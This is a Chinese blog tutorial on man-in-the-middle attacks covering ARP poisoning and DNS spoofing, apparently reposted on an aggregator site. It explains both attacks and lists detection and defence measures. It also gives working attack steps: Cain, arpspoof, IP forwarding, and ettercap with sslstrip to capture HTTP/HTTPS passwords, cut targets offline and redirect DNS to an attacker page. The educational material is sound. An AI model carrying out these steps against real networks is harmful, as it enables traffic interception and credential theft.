一、共享網絡與交換網絡的區別

1、共享網絡

在共享網絡中，由于HUB屬于一層設備，對于到達本身的數據報文，HUB會對報文進行廣播(除了收到報文的那個接口)，因此接在同HUB的所有PC都能收到該報文。前提PC開啟了混雜模式

注：

通常情況下，網卡都是工作在非混雜模式，也就是說即使收到數據報文，網卡會判斷目的MAC是否和自己的一樣，不一樣的話代表數據包不是給自己的，因此會丟棄，只接收那些目的MAC和自己一樣的數據報文。在嗅探時必須開啟混雜模式，在該模式下，網卡不對數據報文進行判斷，一鍋端！

2、交換網絡

交換網絡中交換機會根據MAC-端口對應表進行傳輸，也就是說除了網關，其他同交換機下的PC機無法收到數據報文(沒出現攻擊的情況下)。

二、ARP欺騙

1、ARP

ARP（地址解析協議）是在僅知道主機的IP地址時確定其物理地址的一種協議，其主要用作將IP地址翻譯為以太網的MAC地址，但其也能在ATM和FDDI IP網絡中使用。

2、ARP通訊過程

由于局域網的網絡流通不是根據IP地址進行，而是按照MAC地址進行傳輸、計算機是根據mac來識別一臺機器。每臺主機都會存在一個ARP高速緩存表，里面記錄了局域網內所有主機的Mac地址，當它需要與另一個主機通信時會先查詢本地ARP表，通過對方Mac地址來封裝數據包，如果本地ARP表中沒有對應的Mac地址，它會向局域網發出廣播“我的ip是…我的Mac地址是…請問ip為…的Mac地址”，當對應主機收到廣播核對ip然后通過單點傳輸的方式告訴它自己的Mac地址，然后雙方ARP表中就多了彼此的Mac地址。

3、ARP欺騙

1、單項欺騙

A、B、C三個人，A與C正常通信，B想知道A給C發的內容，就偽造ARP響應包，更改A的ARP表，所以A發送給C的信息會先傳送到B，B可以丟棄數據包，這樣C就收不到A發的數據了，但是C還是可以正常給A發送數據的，這就是單項欺騙

2.雙向欺騙

同樣是A、B、C三個人，B同時給A、C發送響應包B告訴A它的ip是C的ip，Mac地址還是B的，告訴C它的ip是自己的，Mac地址是A的，這樣A、C的通信就都會經過B，這就叫雙向欺騙

3.區別

<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code>單向欺騙:是指欺騙網關 雙向欺騙:是欺騙網關跟被攻擊的兩個機器</code></span></span>

• 1
• 2

4.檢測被欺騙的主機

• 可以利用ARPkiller的”Sniffer殺手”掃描整個局域網IP段，然后查找處在”混雜”模式下的計算機，就可以發現對方了.（綠帽子圖標是正常模式，紅帽子是混雜模式用戶）
• 使用tracert命令在任意一臺受影響的主機上，在DOS命令窗口下運行如下命令：tracert 外網ip。?
  原理：?
  中毒主機在受影響主機和網關之間，扮演了“中間人”的角色。所有本應該到達網關的數據包，由于錯誤的MAC地址，均被發到了中毒主機。此時，中毒主機越俎代庖，起了缺省網關的作用。?
  通俗講tracert命令是看ping這個外網時進過了哪些ip，如果主機被ARP欺騙，使用這個命令就會暴露攻擊者ip，因為我們訪問外網時攻擊者電腦成了中間人所以下一跳就是它的ip

5.防御

<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code>雙綁定， 本地跟路由都做了綁定(注<span style="color:#009900 !important">:mac</span>地址綁定) 采用<span style="color:#009900 !important">ARP</span>防火墻</code></span></span>

6.ARP病毒攻擊癥狀

<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code>打開網頁速度非常慢，甚至打不開 提示IP地址沖突 甚至導致校園網癱瘓斷網 一般會綁定木馬病毒，竊取用戶賬號密碼</code></span></span>

7.ARP攻擊實例

win下使用cain：

選擇嗅探器

點擊左上角開始/停止嗅探的圖標?

點擊空白處，右鍵選擇掃描mac；會出現下圖?
?
選擇第一個子網中全部主機；ok

選擇下方的ARP?
?
點擊左上角的加號?
?
左邊選擇攻擊目標的ip；右邊選網關；然后開始欺騙?
?
如果對方開始登陸某網站，可以通過下方的passWord可以看到明文密碼?
?
cain還有其他的功能在左邊；具體使用，見后面的博客cain的具體使用

Linux下實現斷網攻擊、流量劫持、抓取https的賬號密碼：

1.nmap掃描存活主機?
nmap -sP 掃描ip（可以是網段；如下圖）?
?
-sP：選項告訴Nmap僅僅進行ping掃描。?
2.斷網攻擊

<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code>arpspoof <span style="color:#50a14f">-i</span> 網卡 <span style="color:#50a14f">-t</span> 目標IP 網關<span style="color:#880000 !important"><em>//默認是不轉發的，也就是說執行這條命令，目標機就無法聯網了</em></span></code></span></span>

3.流量劫持

<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code>echo <span style="color:#006666 !important">1</span> ><span style="color:#008800 !important">/proc/sys</span><span style="color:#008800 !important">/net/ipv</span>4/ip_forward 如：arpspoof -i eth<span style="color:#006666 !important">0</span> -t <span style="color:#006666 !important">192.168</span>.<span style="color:#006666 !important">100.15</span> <span style="color:#006666 !important">192.168</span>.<span style="color:#006666 !important">1.1</span> 將<span style="color:#006666 !important">1</span>寫入這個文件就可以流量劫持了，同時目標機就能聯網了，默認為<span style="color:#006666 !important">0</span>，要是還要執行斷網操作，還可以將其改為<span style="color:#006666 !important">0</span> 即：echo <span style="color:#006666 !important">1</span> ><span style="color:#008800 !important">/proc/sys</span><span style="color:#008800 !important">/net/ipv</span>4/ip_forward</code></span></span>

4.抓取http、https的賬號密碼?
http：

<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code>echo <span style="color:#006666 !important">1</span> <span style="color:#4f4f4f !important">></span>/proc/sys/net/ipv4/ip_forward arpspoof <span style="color:#50a14f">-i</span> eth0 <span style="color:#50a14f">-t</span> 目標ip 網關 ettercap <span style="color:#50a14f">-Tq</span> <span style="color:#50a14f">-i</span> eth0 <span style="color:#880000 !important"><em>//-T文本模式啟動 -q安靜模式</em></span></code></span></span>

https:

<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code>先編輯下/etc/ettercap/etter.conf 找到： <span style="color:#880000 !important"><em># if you use iptables:</em></span><span style="color:#880000 !important"><em>#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"</em></span><span style="color:#880000 !important"><em>#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"</em></span> 將后面兩行的<span style="color:#880000 !important"><em>#去掉</em></span> 然后運行sslstrip -a -f -k 實現<span style="color:#000088 !important">https</span>轉換成<span style="color:#000088 !important">http</span>以獲取帳號密碼 echo <span style="color:#006666 !important">1</span> > /proc/sys/net/ipv4/ip_forward arpspoof -i eth0 -t 目標ip ettercap -Tq -i eth0<span style="color:#880000 !important"><em> //-T文本模式啟動 -q安靜模式</em></span></code></span></span>

8. ARP欺騙與嗅探的區別

嗅探一般存在于共享網絡中，在共享網絡中一般使用HUB作為接入層，經過HUB的數據報文不管長得什么樣，因為HUB工作在第一層，看不懂二層以上的報文是啥樣子的，所以一律以廣播處理，在同一網段的計算機只要將網卡設置成混雜模式即可。

嗅探在交換網絡中不適用，因為交換機是通過MAC-端口對應表來轉發數據報文的，所以在交換網絡中如果只將網卡設置成混雜模式，而不進行ARP欺騙，其結果只能接受到網絡中的廣播包。

共享網絡中適用ARP欺騙，那是多此一舉，適用ARP欺騙的方式會對影響網絡流量，對網絡造成很大的影響，另外適用ARP欺騙會產生大量的ARP報文，很容易被發現。而嗅探對整個網絡幾乎沒有影響，因為嗅探只是做監聽，而不會產生多余的數據報文。

三、DNS欺騙

1、DNS

DNS即Domain Name System 的縮寫，域名系統以分布式數據庫的形式將域名和IP地址相互映射。DNS協議即域名解析協議，簡單的說：DNS是用來將域名解析成對應ip地址的協議。

2、工作原理

訪問 www.baidu.com ，首先要向本地DNS服務器發出DNS請求，查詢 www.baidu.com 的IP地址，如果本地DNS服務器沒有在自己的DNS緩存表中發現該網址的記錄，就會向根服務器發起查詢，根服務器收到請求后，將com域服務器的地址返回給本地DNS服務器，本地DNS服務器則繼續向com域發出查詢請求，域服務器將 baidu.com 授權域名服務器的地址返回給本地DNS服務器，本地DNS服務器繼續向 baidu.com 發起查詢，得到 www.baidu.com 的IP地址。

本地DNS服務器得到 www.baidu.com 對應的IP地址后以dns應答包的方式傳遞給用戶，并且在本地建立DNS緩存表。

Windows下查看和刷清空DNS緩存表的命令

<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code> <span style="color:#000088 !important">ipconfig</span> /displaydns <span style="color:#000088 !important">ipconfig</span> /flushdns</code></span></span>

• ?

3、DNS欺騙

首先欺騙者向目標機器發送構造好的ARP應答數據包，ARP欺騙成功后，嗅探到對方發出的DNS請求數據包，分析數據包取得ID和端口號后，向目標發送自己構造好的一個DNS返回包，對方收到DNS應答包后，發現ID和端口號全部正確，即把返回數據包中的域名和對應的IP地址保存進DNS緩存表中，而后來的當真實的DNS應答包返回時則被丟棄。

4、DNS欺騙實例

使用工具是Linux下的ettercap：

1、配置etterca的配置文件

?
上面兩個192.168.1.181是攻擊者的ip

2、開啟Apache，并在根目錄下創建一個html文件給被害者看

3、打開ettercap圖形化界面

<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code>ettercap <span style="color:#50a14f">-G</span></code></span></span>

• 1

?
1. 點擊sniff下的unified sniffing?
?
2. 選擇網卡?
?
3. 選擇host下的掃描主機?
?
4. 查看掃描結果?
?
5. 將目標ip發送到target1；網關發送到target2?
?
6. 點擊mitm下的ARP欺騙?
?
7. 選擇第一個?
?
8. 點擊plugins下的mangge the plugins?
?
9. 雙擊dns_spoof然后開始欺騙?
?
OK

4、防護

1.因為DNS欺騙前提也需要ARP欺騙成功。所以首先做好對ARP欺騙攻擊的防范?
2.不要依賴于DNS，盡管這樣會很不方便，可以使用hosts文件來實現相同的功能；

<span style="color:rgba(0, 0, 0, 0.75)"><span style="color:#000000"><code>Hosts文件位置： windows xp/2003/vista/2008/7系統的HOSTS文件位置 c:<span style="color:#009900 !important">\windows</span><span style="color:#009900 !important">\system</span>32<span style="color:#009900 !important">\drivers</span><span style="color:#009900 !important">\etc</span> 用記事本打開即可進行修改。</code></span></span>

3.使用安全檢測軟件定期檢查系統是否遭受攻擊?
4.使用DNSSEC：DNS安全擴展，是由IETF提供的一系列DNS安全認證的機制（可參考RFC2535）。它提供了一種來源鑒定和數據完整性的擴展，但不去保障可用性、加密性和證實域名不存在。開發 DNSSEC 技術的目的之一是通過對數據進行數字“簽名”來抵御此類攻擊

總結

以上是生活随笔為你收集整理的中间人攻击的实践与原理（ARP毒化、DNS欺骗）的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。